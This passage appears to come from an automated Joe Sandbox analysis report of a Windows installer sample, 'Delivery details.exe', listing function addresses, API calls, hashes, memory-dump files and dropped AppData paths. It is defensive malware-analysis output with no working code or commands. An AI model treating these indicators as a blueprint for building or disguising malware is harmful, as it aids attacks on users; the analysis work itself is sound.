Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040621D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062AB,?,00000000,?,?,: Completed,?), ref: 00406241

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 178ae1473d16ca0066827b6ae8d8e359fc19d0cc8d2a11129686b24aa6896648
Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
Opcode Fuzzy Hash: 178ae1473d16ca0066827b6ae8d8e359fc19d0cc8d2a11129686b24aa6896648
Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D

Uniqueness

Uniqueness Score: -1.00%

Function 00404391 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
Instruction ID: cd8ab83c4a05c7db73f02061534639f879ad9b89da22042d3f94ff2104185c27
Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
Instruction Fuzzy Hash: 83C04CB5780200BAEA208BA49D85F0677545B90700F1449797640F50E0C674D460D66C

Uniqueness

Uniqueness Score: -1.00%

Function 00403441 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040437A Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00404367 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040413E), ref: 00404371

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405414: lstrlenW.KERNEL32(driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(driftsresultaters,00402EEC), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(driftsresultaters,driftsresultaters), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47

Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E

Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 3929c64730fdf79a8eaed380047931b2911a654a3dac7ac27d03dad49a9be9ac
Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
Opcode Fuzzy Hash: 3929c64730fdf79a8eaed380047931b2911a654a3dac7ac27d03dad49a9be9ac
Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404D90 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DA8
GetDlgItem.USER32(?,00000408), ref: 00404DB3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
LoadBitmapW.USER32(0000006E), ref: 00404E10
SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
DeleteObject.GDI32(00000000), ref: 00404E86
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
ShowWindow.USER32(?,00000005), ref: 00404FE0
SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
ImageList_Destroy.COMCTL32(?), ref: 004051B0
GlobalFree.KERNEL32(?), ref: 004051C0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
ShowWindow.USER32(?,00000000), ref: 0040535F
GetDlgItem.USER32(?,000003FE), ref: 0040536A
ShowWindow.USER32(00000000), ref: 00405371

Strings

, xrefs: 00405349
N, xrefs: 0040501B
M, xrefs: 00404F3A

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404814 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404863
SetWindowTextW.USER32(00000000,?), ref: 0040488D
SHBrowseForFolderW.SHELL32(?), ref: 0040493E
CoTaskMemFree.OLE32(00000000), ref: 00404949
lstrcmpiW.KERNEL32(: Completed,00423728,00000000,?,?), ref: 0040497B
lstrcatW.KERNEL32(?,: Completed), ref: 00404987
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999

Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09

Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77

Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D

Strings

A, xrefs: 00404937
: Completed, xrefs: 00404975, 0040497A, 00404985
(7B, xrefs: 00404911
C:\Users\user\AppData\Roaming\akroterion\archmugwump, xrefs: 00404964

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$: Completed$A$C:\Users\user\AppData\Roaming\akroterion\archmugwump
API String ID: 2624150263-4260037868
Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured, xrefs: 004021BD

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured
API String ID: 542301482-3501646704
Opcode ID: 9e3054c51d9544b48ce293b00b3dd82ab5829c6137e4458993770c32d120825f
Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
Opcode Fuzzy Hash: 9e3054c51d9544b48ce293b00b3dd82ab5829c6137e4458993770c32d120825f
Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 9b41355f18f5e90db78f1a51746c29c7f738a4d28b78388705b0efaec490430a
Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
Opcode Fuzzy Hash: 9b41355f18f5e90db78f1a51746c29c7f738a4d28b78388705b0efaec490430a
Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A

Uniqueness

Uniqueness Score: -1.00%

Function 004044E2 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
GetDlgItem.USER32(?,000003E8), ref: 00404594
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
GetSysColor.USER32(?), ref: 004045C2
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
lstrlenW.KERNEL32(?), ref: 004045E3
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
